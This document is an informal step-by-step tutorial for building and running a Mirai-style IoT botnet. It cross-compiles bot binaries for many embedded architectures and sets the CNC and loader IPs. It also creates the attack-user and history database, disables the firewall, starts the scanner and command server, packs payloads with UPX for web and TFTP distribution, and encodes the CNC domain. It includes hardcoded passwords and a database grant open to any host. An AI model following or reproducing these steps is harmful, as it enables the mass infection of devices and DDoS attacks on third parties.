       								===Tutorial By david===
								======================
==================================================================
MyAdminPhpInstall
======================
yum update
yum install httpd mysql-server php -y
service mysqld start
yum install php -y
yum install phpmyadmin -y
service httpd restart

sed -i 's/127.0.0.1/88.99.171.136/g' /etc/httpd/conf.d/phpMyAdmin.conf
nano /etc/httpd/conf.d/phpMyAdmin.conf  192.223.31.243
==================================================================

 https://toolchains.bootlin.com/downloads/releases/toolchains/armv7-eabihf/tarballs/armv7-eabihf--uclibc--stable-2020.08-1.tar.bz2
armv7-eabihf--uclibc--stable-2020.08-1.tar.bz2
armv7-eabihf--uclibc--stable-2020.08-1 arm7
===============================================
// Copy paste this code and put it all on your terminal all at once:

yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

mkdir /etc/xcompile
cd /etc/xcompile 

wget https://github.com/foss-for-synopsys-dwc-arc-processors/toolchain/releases/download/arc-2017.09-release/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2 
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 
tar -xzf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2 
tar -jxf cross-compiler-mips.tar.bz2 
tar -jxf cross-compiler-mipsel.tar.bz2 
tar -jxf cross-compiler-powerpc.tar.bz2 
tar -jxf cross-compiler-sh4.tar.bz2 
tar -jxf cross-compiler-sparc.tar.bz2 
tar -jxf cross-compiler-armv4l.tar.bz2 
tar -jxf cross-compiler-armv5l.tar.bz2 
tar -jxf cross-compiler-armv6l.tar.bz2 
tar -jxf cross-compiler-armv7l.tar.bz2 
tar -jxf cross-compiler-x86_64.tar.bz2 
rm -rf *.tar.bz2 
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
mv cross-compiler-i586 i586 
mv cross-compiler-m68k m68k 
mv cross-compiler-i686 i686
mv cross-compiler-mips mips 
mv cross-compiler-mipsel mipsel 
mv cross-compiler-powerpc powerpc 
mv cross-compiler-sh4 sh4 
mv cross-compiler-sparc sparc 
mv cross-compiler-armv4l armv4l 
mv cross-compiler-armv5l armv5l 
mv cross-compiler-armv6l armv6l 
mv cross-compiler-armv7l armv7l 
mv cross-compiler-x86_64 x86_64 

cd /tmp
wget https://dl.google.com/go/go1.13.6.linux-amd64.tar.gz
tar -xvf go1.13.6.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords

change IP to your ip
 CHANGE IP(s) IN /bot/includes.h
 CHANGE IP(s) IN /cnc/main.go
 CHANGE IP(s) IN /loader/src/main.c
 CHANGE IP(s) IN /scanListen.go
 CHANGE IP(s) IN /dlr/main.c (repalce the "." with "," so it works) 
 CHANGE IP(s) IN /loader/src/headers/config.h


// We will setup the database, run these commands on your terminal:

service mysqld start
mysql_secure_installation

// Now Login with your mysql pass by running this command:

mysql -u root -pServer1991

// Now we will add the database, copy and paste this on your terminal:

yum install mariadb-server -y
systemctl start mariadb.service
mysql_secure_installation

mysql -proot

use mysql
GRANT ALL ON *.* to root@'%' IDENTIFIED BY 'root';
FLUSH PRIVILEGES;

CREATE DATABASE root;
use root;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `banned` int(10) unsigned DEFAULT '0',
  `fakebots` int(10) unsigned DEFAULT '0',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, 'dank', 'DankCFW', 0, 0, 0, 0, -1, 0, 0, 1, 30, '');
INSERT INTO users VALUES (NULL, 'pacho', 'nicecunt', 0, 0, 0, 0, -1, 0, 0, 1, 30, '');
INSERT INTO users VALUES (NULL, 'doom', 'David173', 0, 0, 0, 0, -1, 0, 0, 1, 30, '');
exit;

                                 ^^^^^^^^    ^^^^^^^^
//                      PUT YOUR USERNAME AND PASSWORD HERE
// Now your database is complete, we will restart and disable services:

service iptables stop 
service httpd restart  
service mariadb restart

// Alright, we have to compile the bot and screen the cnc server by doing this:

cd ~/
chmod 0777 * -R
sh build.sh

nano /usr/include/bits/typesizes.h
scroll down and edit the 1024 to 999999
THEN SAVE IT 
ulimit -n999999; ulimit -u999999; ulimit -e999999

cd loader/
screen ./scanListen
cd
screen ./cnc




wget https://github.com/upx/upx/releases/download/v3.94/upx-3.94-i386_linux.tar.xz
tar -xvf *.xz
mv upx*/upx .
./upx --ultra-brute /var/www/html/beastmode/*
./upx --ultra-brute /var/lib/tftpboot/*
rm -rf upx*


first point your domain to ip: example subdomain.domain.name
cd enc
yum install gcc
gcc enc.c -o enc
./enc string "subdomain.domain.name"
Go to table.c and replace TABLE_CNC_DOMAIN, TABLE_SCAN_DOMAIN with the string it output